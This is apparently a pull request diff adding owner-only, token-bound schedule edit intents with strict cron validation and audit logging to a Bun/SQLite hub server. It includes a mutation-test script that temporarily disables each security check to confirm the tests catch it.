+    if (changed.changes === 1) {
+      audit(row.created_by_user, null, "external_schedule.edit_expired", row.intent_id, row.network_id, {
+        node_id: row.node_id, schedule_id: row.schedule_id, base_revision: row.base_revision, error_code: "intent_expired",
+      });
+    }
+  }
+}
+
+export async function handleExternalScheduleEditRequest(ctx: ExternalScheduleEditContext): Promise<Response | null> {
+  const match = ctx.url.pathname.match(/^\/api\/nodes\/([^/]+)\/external-schedule-edits(?:\/(pending|[^/]+)(?:\/(ack))?)?$/);
+  if (!match) return null;
+  const nodeId = decodeURIComponent(match[1]);
+  if (!NODE_ID_RE.test(nodeId)) return error("invalid_node_id", 400);
+  const tail = match[2] || null;
+  const ack = match[3] === "ack";
+  const node = nodeRow(nodeId);
+  if (!node) return error("node_not_found", 404);
+
+  if (tail === "pending" && ctx.req.method === "GET") {
+    const denied = requireBoundNode(ctx, node);
+    if (denied) return denied;
+    const now = Date.now();
+    const intent = db.transaction(() => {
+      expireOpenIntents(node, now);
+      const already = db.get<EditRow>(
+        `SELECT * FROM external_schedule_edits
+         WHERE node_id = ?1 AND network_id = ?2 AND status = 'delivered' AND consumed_by_token = ?3
+         ORDER BY delivered_at ASC LIMIT 1`,
+        node.node_id, node.network_id, ctx.auth!.tokenId,
+      );
+      if (already) return already;
+      const pending = db.get<EditRow>(
+        `SELECT * FROM external_schedule_edits
+         WHERE node_id = ?1 AND network_id = ?2 AND status = 'pending' AND expires_at > ?3
+         ORDER BY created_at ASC LIMIT 1`,
+        node.node_id, node.network_id, now,
+      );
+      if (!pending) return null;
+      const claimed = db.run(
+        `UPDATE external_schedule_edits SET status = 'delivered', delivered_at = ?1, consumed_by_token = ?2
+         WHERE intent_id = ?3 AND status = 'pending' AND expires_at > ?1`,
+        [now, ctx.auth!.tokenId, pending.intent_id],
+      );
+      if (claimed.changes !== 1) return null;
+      audit(pending.created_by_user, null, "external_schedule.edit_delivered", pending.intent_id, pending.network_id, {
+        node_id: pending.node_id, schedule_id: pending.schedule_id, base_revision: pending.base_revision,
+      });
+      return { ...pending, status: "delivered", delivered_at: now, consumed_by_token: ctx.auth!.tokenId };
+    });
+    return Response.json({ ok: true, intent: intent ? publicEdit(intent) : null });
+  }
+
+  if (tail && tail !== "pending" && ack && ctx.req.method === "POST") {
+    const denied = requireBoundNode(ctx, node);
+    if (denied) return denied;
+    let body: Record<string, unknown>;
+    try { body = await bodyObject(ctx.req); } catch { return error("invalid_json", 400); }
+    if (!exactKeys(body, ["status", "result_revision", "error_code"])) return error("invalid_ack", 400);
+    if (body.status !== "applied" && body.status !== "rejected") return error("invalid_ack", 400);
+    if (body.status === "applied" && !Number.isSafeInteger(body.result_revision)) return error("invalid_result_revision", 400);
+    if (body.status === "rejected" && body.result_revision !== undefined) return error("invalid_ack", 400);
+    if (body.error_code !== undefined && (typeof body.error_code !== "string" || !/^[a-z0-9_]{1,64}$/.test(body.error_code))) return error("invalid_error_code", 400);
+    const now = Date.now();
+    const result = db.transaction(() => {
+      const row = db.get<EditRow>("SELECT * FROM external_schedule_edits WHERE intent_id = ?1", tail);
+      if (!row || row.node_id !== node.node_id || row.network_id !== node.network_id || row.consumed_by_token !== ctx.auth!.tokenId) {
+        return { error: "intent_not_found", status: 404 } as const;
+      }
+      if (row.status === "applied" || row.status === "rejected") {
+        const requestedRevision = body.status === "applied" ? Number(body.result_revision) : null;
+        const requestedError = body.error_code ?? null;
+        if (row.status === body.status && row.result_revision === requestedRevision && row.error_code === requestedError) {
+          return { row, idempotent: true } as const;
+        }
+        return { error: "intent_already_terminal", status: 409 } as const;
+      }
+      if (row.status !== "delivered") return { error: "intent_not_delivered", status: 409 } as const;
+      if (body.status === "applied" && Number(body.result_revision) !== row.base_revision + 1) {
+        return { error: "invalid_result_revision", status: 409 } as const;
+      }
+      const changed = db.run(
+        `UPDATE external_schedule_edits SET status = ?1, acked_at = ?2, result_revision = ?3, error_code = ?4
+         WHERE intent_id = ?5 AND status = 'delivered' AND consumed_by_token = ?6`,
+        [body.status, now, body.status === "applied" ? Number(body.result_revision) : null, body.error_code ?? null, row.intent_id, ctx.auth!.tokenId],
+      );
+      if (changed.changes !== 1) return { error: "intent_state_conflict", status: 409 } as const;
+      audit(row.created_by_user, null, `external_schedule.edit_${body.status}`, row.intent_id, row.network_id, {
+        node_id: row.node_id, schedule_id: row.schedule_id, base_revision: row.base_revision,
+        result_revision: body.status === "applied" ? Number(body.result_revision) : null,
+        error_code: body.error_code ?? null,
+      });
+      return { row: { ...row, status: String(body.status), acked_at: now, result_revision: body.status === "applied" ? Number(body.result_revision) : null, error_code: body.error_code ?? null } } as const;
+    });
+    if ("error" in result) return error(result.error, result.status);
+    return Response.json({ ok: true, intent: publicEdit(result.row), ...(result.idempotent ? { idempotent: true } : {}) });
+  }
+
+  if (tail) return error("not_found", 404);
+
+  if (ctx.req.method === "GET") {
+    const denied = requireOwner(ctx, node, ctx.url.searchParams.get("network_id"));
+    if (denied) return denied;
+    const rows = db.all<EditRow>(
+      "SELECT * FROM external_schedule_edits WHERE node_id = ?1 AND network_id = ?2 AND created_by_user = ?3 ORDER BY created_at DESC LIMIT 100",
+      node.node_id, node.network_id, ctx.auth!.userId,
+    );
+    return Response.json({ ok: true, edits: rows.map(publicEdit) });
+  }
+
+  if (ctx.req.method !== "POST") return error("method_not_allowed", 405);
+  let body: Record<string, unknown>;
+  try { body = await bodyObject(ctx.req); } catch { return error("invalid_json", 400); }
+  if (!exactKeys(body, ["network_id", "schedule_id", "base_revision", "patch"])) return error("invalid_request", 400);
+  const denied = requireOwner(ctx, node, body.network_id);
+  if (denied) return denied;
+  if (typeof body.schedule_id !== "string" || !SCHEDULE_ID_RE.test(body.schedule_id)) return error("invalid_schedule_id", 400);
+  if (!Number.isSafeInteger(body.base_revision) || Number(body.base_revision) < 0) return error("invalid_revision", 400);
+  let patch: ExternalSchedulePatch;
+  try { patch = parseExternalSchedulePatch(body.patch); } catch (e: any) { return error(String(e?.message || "invalid_patch"), 400); }
+  const schedule = reportedSchedule(node, body.schedule_id);
+  if (!schedule) return error("schedule_not_found", 404);
+  if (schedule.kind !== "cron" || schedule.editable !== true || !Number.isSafeInteger(schedule.revision)) return error("schedule_read_only", 409);
+  if (Number(schedule.revision) !== Number(body.base_revision)) return error("revision_conflict", 409, { current_revision: schedule.revision });
+
+  const intentId = `sei_${crypto.randomUUID()}`;
+  const now = Date.now();
+  try {
+    db.transaction(() => {
+      // Re-read ownership + snapshot inside the write transaction so a
+      // concurrent owner/snapshot change cannot slip between preflight and INSERT.
+      const currentNode = nodeRow(node.node_id);
+      if (!currentNode || currentNode.owner_user_id !== ctx.auth!.userId || currentNode.network_id !== node.network_id) throw new Error("node_owner_changed");
+      const current = reportedSchedule(currentNode, body.schedule_id as string);
+      if (!current || current.editable !== true || current.kind !== "cron") throw new Error("schedule_read_only");
+      if (Number(current.revision) !== Number(body.base_revision)) throw new Error("revision_conflict");
+      db.run(
+        `INSERT INTO external_schedule_edits
+         (intent_id, network_id, node_id, schedule_id, base_revision, patch_json, status, expires_at, created_at, created_by_user, created_by_token)
+         VALUES (?1, ?2, ?3, ?4, ?5, ?6, 'pending', ?7, ?8, ?9, ?10)`,
+        [intentId, node.network_id, node.node_id, body.schedule_id, body.base_revision, JSON.stringify(patch), now + INTENT_TTL_MS, now, ctx.auth!.userId, ctx.auth!.tokenId],
+      );
+      audit(ctx.auth!.userId, ctx.auth!.username, "external_schedule.edit_requested", intentId, node.network_id!, {
+        node_id: node.node_id, schedule_id: body.schedule_id, base_revision: body.base_revision, fields: Object.keys(patch).sort(),
+      });
+    });
+  } catch (e: any) {
+    const code = String(e?.message || "edit_create_failed");
+    if (/UNIQUE|duplicate key/i.test(code)) return error("edit_in_flight", 409);
+    if (code === "revision_conflict") return error(code, 409);
+    if (code === "schedule_read_only") return error(code, 409);
+    if (code === "node_owner_changed") return error(code, 409);
+    throw e;
+  }
+  try { pushEvent(node.alias || node.node_id, { type: "external_schedule_edit", intent_id: intentId }, node.network_id); } catch {}
+  const created = db.get<EditRow>("SELECT * FROM external_schedule_edits WHERE intent_id = ?1", intentId)!;
+  return Response.json({ ok: true, intent: publicEdit(created) }, { status: 202 });
+}

--- a/server/src/server.ts
+++ b/server/src/server.ts
@@ -44,6 +44,7 @@ import {
 import { resolveRestFromSession } from "./rest-identity.js";
 import { stampTaskAuthOrigin, type TaskAuthOrigin } from "./task-auth-origin.js";
 import { assertScheduledTaskBackendSupported, handleScheduledTaskRequest, startScheduledTaskScheduler } from "./scheduled-tasks.js";
+import { handleExternalScheduleEditRequest } from "./external-schedule-edits.js";
 import { recordDeliveredStaleEvents } from "./task-lifecycle-watcher.js";
 
 const PORT = Number(process.env.PORT) || 9200;
@@ -1025,7 +1026,7 @@ return Bun.serve({
       try {
         const body = await req.json() as any;
         if (!body.network_id || !body.node_name) return withCors(req, Response.json({ ok: false, error: "network_id and node_name required" }, { status: 400 }));
-        const result = createNetworkTokenForNode(resolved.user.user_id, body.network_id, body.node_name);
+        const result = createNetworkTokenForNode(resolved.user.user_id, body.network_id, body.node_name, body.node_id);
         if (result.ok) logAudit(resolved.user.user_id, resolved.user.username, "node_token_created", "network", body.network_id, body.node_name);
         return withCors(req, Response.json(result, { status: result.ok ? 200 : 400 }));
       } catch (e: any) {
@@ -1428,6 +1429,19 @@ return Bun.serve({
     if (restScope.denied) {
       return withCors(req, Response.json({ ok: false, error: restScope.denied }, { status: 403 }));
     }
+
+    // RFC-036 owner-gated host schedule edits. This handler independently
+    // verifies exact node ownership and node-token binding; network admin is
+    // deliberately not an override.
+    const requestCredential = requestToken(req);
+    const externalScheduleEditResponse = await handleExternalScheduleEditRequest({
+      req,
+      url,
+      auth: restAuth,
+      isUserToken: requestCredential.startsWith("utok_"),
+      isNodeToken: requestCredential.startsWith("ntok_"),
+    });
+    if (externalScheduleEditResponse) return withCors(req, externalScheduleEditResponse);
 
     // Hub-owned scheduled tasks. Dashboard and mobile are management
     // clients only; each occurrence is dispatched as an ordinary task by the

--- a/server/src/shared/external-schedule-contract.ts
+++ b/server/src/shared/external-schedule-contract.ts
@@ -58,4 +58,3 @@ export function parseExternalSchedulePatch(raw: unknown): ExternalSchedulePatch 
   if (obj.cron !== undefined) patch.cron = parseManagedCronExpression(obj.cron);
   return patch;
 }
-

--- a/server/src/shared/external-schedule-contract.ts
+++ b/server/src/shared/external-schedule-contract.ts
@@ -1,0 +1,61 @@
+const FIELD_BOUNDS = [
+  [0, 59],
+  [0, 23],
+  [1, 31],
+  [1, 12],
+  [0, 7],
+] as const;
+
+function integer(text: string, min: number, max: number): number {
+  if (!/^\d+$/.test(text)) throw new Error("invalid_cron");
+  const value = Number(text);
+  if (!Number.isSafeInteger(value) || value < min || value > max) throw new Error("invalid_cron");
+  return value;
+}
+
+function validateAtom(atom: string, min: number, max: number): void {
+  const [base, step, extra] = atom.split("/");
+  if (extra !== undefined || !base) throw new Error("invalid_cron");
+  if (step !== undefined) integer(step, 1, max - min + 1);
+  if (base === "*") return;
+  const range = base.split("-");
+  if (range.length === 1) {
+    integer(range[0], min, max);
+    return;
+  }
+  if (range.length !== 2) throw new Error("invalid_cron");
+  const start = integer(range[0], min, max);
+  const end = integer(range[1], min, max);
+  if (start > end) throw new Error("invalid_cron");
+}
+
+/** Strict five-field cron timing. It deliberately excludes commands, names,
+ * @aliases, a sixth seconds field and every control character. */
+export function parseManagedCronExpression(raw: unknown): string {
+  if (typeof raw !== "string" || raw.length < 5 || raw.length > 120) throw new Error("invalid_cron");
+  if (/[^\x20-\x7e]/.test(raw) || /[\r\n]/.test(raw)) throw new Error("invalid_cron");
+  const fields = raw.trim().split(/ +/);
+  if (fields.length !== 5) throw new Error("invalid_cron");
+  fields.forEach((field, index) => {
+    if (!field || !/^[0-9*/,-]+$/.test(field)) throw new Error("invalid_cron");
+    for (const atom of field.split(",")) validateAtom(atom, FIELD_BOUNDS[index][0], FIELD_BOUNDS[index][1]);
+  });
+  return fields.join(" ");
+}
+
+export type ExternalSchedulePatch = { enabled?: boolean; cron?: string };
+
+export function parseExternalSchedulePatch(raw: unknown): ExternalSchedulePatch {
+  if (!raw || typeof raw !== "object" || Array.isArray(raw)) throw new Error("invalid_patch");
+  const obj = raw as Record<string, unknown>;
+  const keys = Object.keys(obj);
+  if (keys.length === 0 || keys.some((key) => key !== "enabled" && key !== "cron")) throw new Error("invalid_patch");
+  const patch: ExternalSchedulePatch = {};
+  if (obj.enabled !== undefined) {
+    if (typeof obj.enabled !== "boolean") throw new Error("invalid_enabled");
+    patch.enabled = obj.enabled;
+  }
+  if (obj.cron !== undefined) patch.cron = parseManagedCronExpression(obj.cron);
+  return patch;
+}
+

--- a/server/src/tools.ts
+++ b/server/src/tools.ts
@@ -496,6 +496,10 @@ export function registerTools(server: McpServer, clientIP?: string, enforceNetwo
           next_run_at: z.string().datetime({ offset: true }).max(64).nullable(),
           log_ref: z.string().min(1).max(255).nullable(),
           enabled: z.boolean(),
+          // RFC-036 — only agent-node managed cron markers advertise write
+          // capability. Legacy/other kinds omit these fields and stay read-only.
+          editable: z.boolean().optional(),
+          revision: z.number().int().min(0).optional(),
         }).strict()).max(64),
         error: z.enum(["invalid_manifest", "unsafe_manifest", "read_failed"]).optional(),
       }).strict().optional().describe("Bounded node-reported external schedule snapshot; never includes host paths or commands"),
@@ -717,6 +721,8 @@ export function registerTools(server: McpServer, clientIP?: string, enforceNetwo
           upsertNodeWithSec1Guard({
             node_id,
             callerNetworkId: effectiveNetId ?? null,
+            callerUserId: enforceUserId ?? null,
+            callerTokenId: callerTokenId ?? null,
             node_name: nn || effectiveAlias,
             alias: effectiveAlias,
             runtime: nodeRuntime,
@@ -3956,6 +3962,8 @@ export function registerTools(server: McpServer, clientIP?: string, enforceNetwo
 export interface UpsertNodeWithSec1GuardInput {
   node_id: string;
   callerNetworkId: string | null;
+  callerUserId?: string | null;
+  callerTokenId?: string | null;
   node_name?: string | null;
   alias?: string | null;
   runtime?: string | null;
@@ -3968,18 +3976,37 @@ export interface UpsertNodeWithSec1GuardInput {
 }
 export type UpsertNodeOutcome =
   | { result: "inserted" | "updated"; node_id: string }
-  | { result: "refused"; reason: "cross_network"; existingNet: string | null; callerNet: string | null }
+  | { result: "refused"; reason: "cross_network" | "token_node_mismatch" | "owner_mismatch"; existingNet: string | null; callerNet: string | null }
   | { result: "skipped"; reason: "missing_node_id" };
 
 const _norm = (x: string | null | undefined) => (x === null || x === undefined ? "default" : x);
 
 export function upsertNodeWithSec1Guard(input: UpsertNodeWithSec1GuardInput): UpsertNodeOutcome {
   if (!input.node_id) return { result: "skipped", reason: "missing_node_id" };
-  const existing = db.get<{ network_id: string | null }>(
-    "SELECT network_id FROM nodes WHERE node_id = ?1",
+  const existing = db.get<{ network_id: string | null; owner_user_id: string | null }>(
+    "SELECT network_id, owner_user_id FROM nodes WHERE node_id = ?1",
     input.node_id,
   );
   const callerNet = input.callerNetworkId;
+
+  // RFC-036 — when a token was minted with a node_id binding, a heartbeat may
+  // report only that exact node. Legacy unbound ntok rows remain compatible,
+  // but they can never consume owner-gated schedule intents.
+  if (input.callerTokenId) {
+    const token = db.get<{ bound_node_id: string | null; user_id: string; network_id: string | null }>(
+      "SELECT bound_node_id, user_id, network_id FROM api_tokens WHERE token_id = ?1",
+      input.callerTokenId,
+    );
+    if (token?.bound_node_id && token.bound_node_id !== input.node_id) {
+      return { result: "refused", reason: "token_node_mismatch", existingNet: existing?.network_id ?? null, callerNet };
+    }
+    if (token?.network_id && _norm(token.network_id) !== _norm(callerNet)) {
+      return { result: "refused", reason: "cross_network", existingNet: existing?.network_id ?? null, callerNet };
+    }
+  }
+  if (existing?.owner_user_id && input.callerUserId !== existing.owner_user_id) {
+    return { result: "refused", reason: "owner_mismatch", existingNet: existing.network_id, callerNet };
+  }
 
   // Legacy / first-write paths: row missing OR network_id NULL → claim.
   const isLegacy = !existing

--- a/tests/test688-owner-gated-schedule-hub/Dockerfile
+++ b/tests/test688-owner-gated-schedule-hub/Dockerfile
@@ -1,0 +1,11 @@
+FROM oven/bun:1.3.14
+WORKDIR /workspace
+COPY server/package.json ./server/package.json
+RUN cd server && bun install --ignore-scripts
+COPY server ./server
+COPY tests/test601-hub-scheduled-tasks ./tests/test601-hub-scheduled-tasks
+COPY tests/test688-owner-gated-schedule-hub ./tests/test688-owner-gated-schedule-hub
+ARG SOURCE_COMMIT
+ENV TEST688_SOURCE_COMMIT=$SOURCE_COMMIT
+RUN chmod 0755 /workspace/tests/test688-owner-gated-schedule-hub/run.sh
+ENTRYPOINT ["/workspace/tests/test688-owner-gated-schedule-hub/run.sh"]

--- a/tests/test688-owner-gated-schedule-hub/run.sh
+++ b/tests/test688-owner-gated-schedule-hub/run.sh
@@ -1,0 +1,132 @@
+#!/usr/bin/env bash
+set -euo pipefail
+
+ARTIFACT_DIR=${ARTIFACT_DIR:-/artifacts}
+REPORT="$ARTIFACT_DIR/report-test688-owner-gated-schedule-hub.txt"
+mkdir -p "$ARTIFACT_DIR"
+: > "$REPORT"
+exec > >(tee -a "$REPORT") 2>&1
+
+echo "# test688 — RFC-036 owner-gated schedule Hub"
+echo "source_commit=${TEST688_SOURCE_COMMIT:-unknown}"
+echo "date=$(date -Is)"
+
+run_real() {
+  local db_path=$1
+  COMMHUB_DB="$db_path" bun test server/src/external-schedule-edits-http.test.ts
+}
+
+expect_red() {
+  local label=$1 db_path=$2
+  set +e
+  run_real "$db_path" >"/tmp/test688-${label}.log" 2>&1
+  local rc=$?
+  set -e
+  if [ "$rc" -eq 0 ]; then
+    echo "MUTATION_FALSE_GREEN: $label"
+    sed -n '1,260p' "/tmp/test688-${label}.log"
+    exit 1
+  fi
+  echo "MUTATION_RED: $label rc=$rc"
+}
+
+backup() { cp "$1" "/tmp/test688-$(basename "$1")"; }
+restore() { cp "/tmp/test688-$(basename "$1")" "$1"; }
+
+echo "L0 build"
+bun build server/src/index.ts --target bun --outfile /tmp/commhub-b4.js
+test -s /tmp/commhub-b4.js
+
+echo "L1 real Hub HTTP + SQLite contract"
+run_real /tmp/test688-green.db
+
+echo "L1b compatibility: SEC1, REST projections, Hub scheduler, file network scope"
+COMMHUB_DB=/tmp/test688-reg-sec1.db bun test server/src/config-apply-sec1.test.ts
+COMMHUB_DB=/tmp/test688-reg-rest.db bun test server/src/rest-explicit-columns-http.test.ts
+COMMHUB_DB=/tmp/test688-reg-sched.db bun test server/src/scheduled-tasks-http.test.ts
+COMMHUB_DB=/tmp/test688-reg-file.db bun test server/src/file-network-scope.test.ts
+
+backup server/src/auth.ts
+backup server/src/db.ts
+backup server/src/server.ts
+backup server/src/tools.ts
+backup server/src/external-schedule-edits.ts
+backup server/src/shared/external-schedule-contract.ts
+
+echo "L2 witnessed-red: exact node owner has no admin/member bypass"
+sed -i 's/if (ctx.auth.userId !== node.owner_user_id)/if (false \&\& ctx.auth.userId !== node.owner_user_id)/' server/src/external-schedule-edits.ts
+grep -Fq 'if (false && ctx.auth.userId !== node.owner_user_id)' server/src/external-schedule-edits.ts
+expect_red exact-owner-no-admin-bypass /tmp/test688-mut-owner.db
+restore server/src/external-schedule-edits.ts
+
+echo "L3 witnessed-red: a legacy NULL owner cannot be first-claimed"
+sed -i 's/if (existing \&\& !existing.owner_user_id) throw new Error("node_owner_unclaimed");/if (false \&\& existing \&\& !existing.owner_user_id) throw new Error("node_owner_unclaimed");/' server/src/auth.ts
+grep -Fq 'if (false && existing && !existing.owner_user_id)' server/src/auth.ts
+expect_red legacy-owner-read-only /tmp/test688-mut-legacy.db
+restore server/src/auth.ts
+
+echo "L3b witnessed-red: immutable owner claim is audited in the mint transaction"
+sed -i "s/'external_schedule.owner_claimed'/'external_schedule.owner_claim_missing'/" server/src/auth.ts
+grep -Fq "'external_schedule.owner_claim_missing'" server/src/auth.ts
+expect_red owner-claim-audit /tmp/test688-mut-owner-audit.db
+restore server/src/auth.ts
+
+echo "L4 witnessed-red: structured patch allowlist is exact"
+sed -i 's/keys.some((key) => key !== "enabled" \&\& key !== "cron")/keys.some((_key) => false)/' server/src/shared/external-schedule-contract.ts
+grep -Fq 'keys.some((_key) => false)' server/src/shared/external-schedule-contract.ts
+expect_red structured-fields-only /tmp/test688-mut-fields.db
+restore server/src/shared/external-schedule-contract.ts
+
+echo "L5 witnessed-red: node consumer binding is exact"
+perl -0pi -e 's/if \(!token \|\| token\.bound_node_id !== node\.node_id \|\| token\.network_id !== node\.network_id \|\| token\.user_id !== node\.owner_user_id\) \{/if (!token) {/' server/src/external-schedule-edits.ts
+grep -Fq 'if (!token) {' server/src/external-schedule-edits.ts
+expect_red exact-bound-node-token /tmp/test688-mut-binding.db
+restore server/src/external-schedule-edits.ts
+
+echo "L6 witnessed-red: optimistic revision is checked before and inside the transaction"
+sed -i 's/Number(schedule.revision) !== Number(body.base_revision)/false/' server/src/external-schedule-edits.ts
+sed -i 's/Number(current.revision) !== Number(body.base_revision)/false/' server/src/external-schedule-edits.ts
+test "$(grep -Fc 'if (false)' server/src/external-schedule-edits.ts)" -ge 2
+expect_red revision-cas /tmp/test688-mut-revision.db
+restore server/src/external-schedule-edits.ts
+
+echo "L7 witnessed-red: cross-worker single-flight is DB-enforced"
+sed -i 's/CREATE UNIQUE INDEX IF NOT EXISTS idx_external_schedule_edits_singleflight/CREATE INDEX IF NOT EXISTS idx_external_schedule_edits_singleflight/' server/src/db.ts
+grep -Fq 'CREATE INDEX IF NOT EXISTS idx_external_schedule_edits_singleflight' server/src/db.ts
+expect_red sqlite-singleflight /tmp/test688-mut-singleflight.db
+restore server/src/db.ts
+
+echo "L8 witnessed-red: lifecycle audit is mandatory"
+perl -0pi -e 's/\): void \{\n  db\.run\(\n    `INSERT INTO audit_log/): void {\n  return;\n  db.run(\n    `INSERT INTO audit_log/' server/src/external-schedule-edits.ts
+grep -A1 -F '): void {' server/src/external-schedule-edits.ts | grep -Fq 'return;'
+expect_red mandatory-audit /tmp/test688-mut-audit.db
+restore server/src/external-schedule-edits.ts
+
+echo "L9 witnessed-red: delivered intents expire instead of wedging the node"
+sed -i "s/status IN ('pending', 'delivered')/status = 'pending'/g" server/src/external-schedule-edits.ts
+test "$(grep -Fc "status = 'pending' AND expires_at" server/src/external-schedule-edits.ts)" -ge 2
+expect_red delivered-ttl /tmp/test688-mut-expiry.db
+restore server/src/external-schedule-edits.ts
+
+echo "L10 witnessed-red: terminal retry must be semantically identical"
+sed -i 's/if (row.status === body.status \&\& row.result_revision === requestedRevision \&\& row.error_code === requestedError)/if (true || (row.status === body.status \&\& row.result_revision === requestedRevision \&\& row.error_code === requestedError))/' server/src/external-schedule-edits.ts
+grep -Fq 'if (true || (row.status === body.status' server/src/external-schedule-edits.ts
+expect_red exact-terminal-retry /tmp/test688-mut-terminal.db
+restore server/src/external-schedule-edits.ts
+
+echo "L11 witnessed-red: report_status cannot cross an established owner"
+sed -i 's/if (existing?.owner_user_id \&\& input.callerUserId !== existing.owner_user_id)/if (false \&\& existing?.owner_user_id \&\& input.callerUserId !== existing.owner_user_id)/' server/src/tools.ts
+grep -Fq 'if (false && existing?.owner_user_id' server/src/tools.ts
+expect_red report-owner-verify /tmp/test688-mut-report-owner.db
+restore server/src/tools.ts
+
+echo "L12 witnessed-red: HTTP token mint must carry node_id into the atomic owner transaction"
+sed -i 's/, body.node_id);/);/' server/src/server.ts
+grep -Fq 'createNetworkTokenForNode(resolved.user.user_id, body.network_id, body.node_name);' server/src/server.ts
+expect_red token-mint-node-id-wire /tmp/test688-mut-token-wire.db
+restore server/src/server.ts
+
+echo "L13 restored green"
+run_real /tmp/test688-restored.db
+
+echo "RESULT: PASS"


### PR DESCRIPTION
## What changed

- add immutable `nodes.owner_user_id` and token `bound_node_id` anchors
- mint a new node's owner binding and ntok in one SQLite transaction
- add owner-only external schedule edit intents with TTL, single-flight, revision CAS, token-bound pull and exact terminal ACK
- constrain patches to `enabled` plus strict five-field cron timing
- expose `editable` and `revision` in bounded external schedule snapshots
- add mandatory lifecycle audit with public response field minimization

## Security model

This implements the Hub/backend segment of RFC-036. The authenticated `utok_` user id must exactly equal the node's immutable owner; network owner/admin/member roles are not a bypass. Legacy `owner_user_id=NULL` nodes remain read-only. Node consumers must present the exact node-bound ntok. No model-facing write tool, command, path, environment or arbitrary crontab line is accepted.

Design contract: #687 (merge/review before this implementation).

## Validation

- exact source: `bf72f0e5201d9957dbb2255a391676a5e225c27c`
- report-only head: `8681724e0eab10c3e73aeb9e213a119a52ae8bb5`
- Docker image: `anet-test688:dev` / `sha256:04ed23fd1d7d2413e7a915ad0849d2c77b8c7752387625c0f97e944abc3c448d`
- embedded `TEST688_SOURCE_COMMIT` matches exact source
- 133 normal-path tests, 524 assertions, 0 failures
- 12/12 witnessed-red mutations, restored green
- real Bun HTTP + real SQLite; SEC1, REST projection, Hub scheduler and file-network compatibility included

Evidence: `docs/tests/report-test688-owner-gated-schedule-hub.txt`.

## Honest boundary

Backend only. It does not claim agent-node host apply or Dashboard editing is implemented. Those remain separately reviewed follow-on segments. No merge, deployment or release is requested by opening this draft.
